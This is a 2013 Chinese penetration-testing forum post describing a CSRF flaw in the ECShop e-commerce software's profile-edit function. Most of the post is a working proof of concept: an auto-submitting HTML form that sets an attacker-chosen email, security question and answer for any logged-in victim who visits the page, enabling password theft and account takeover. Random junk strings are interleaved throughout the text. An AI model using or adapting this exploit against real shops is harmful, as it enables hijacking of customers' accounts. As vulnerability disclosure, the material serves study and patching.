中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
. t1 s+ l" Y8 X" c0 ~1 Z0 e' F
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
* {" B( N7 H4 \( j8 g
: `4 {, ~4 m7 v: L. W( k
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
|! @3 o9 L' L" a- N% p" ?
3 p' o4 B- D0 Q8 C: P
详细说明:
3 m6 s/ U- V* ^/ S" k+ o
利用csrf和xss可以突破官方所说的“障碍”
- D( y4 [8 S( p* ^4 ], s6 a
xss版本已经有人说明
5 D5 ]1 i! U7 p9 T2 J9 ~( \) o: F
这里给出csrf版本
7 y s) N6 U+ M( I
, K. `$ F4 i3 c5 v6 Q& Q
漏洞证明:
/ P: N# k2 h4 ^
<html>
! o( X8 s# c" K Z! q
<body>
" y3 N2 b' N( P9 W5 }: f1 m4 T
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
) @) V" x$ L: V% k
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
5 I0 S# \/ t" j5 c( T+ ]- P
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
9 z1 L$ k: b; x& r: p' O; X2 ~1 H* z
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
; Q( M+ }5 P5 b; y$ S% U
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
- p/ k$ ?! M" F7 G0 Y. D6 m
</body>
8 z& P. e0 y( ^- W$ K
<script>
, ]/ I9 w" @" X+ y3 e2 T+ a" ]
document.forms[0].submit();
4 Q) E- V# t' I4 T5 v w0 n( r1 x
</script>
6 h# D8 Y0 q3 h9 a1 C: k" V& D
</html>
! b& D" s# B3 n, ^ o, t5 M+ M1 k
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
) E7 E5 M0 l0 _" y% E* {8 X
) L+ G! H% u( w0 D7 q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2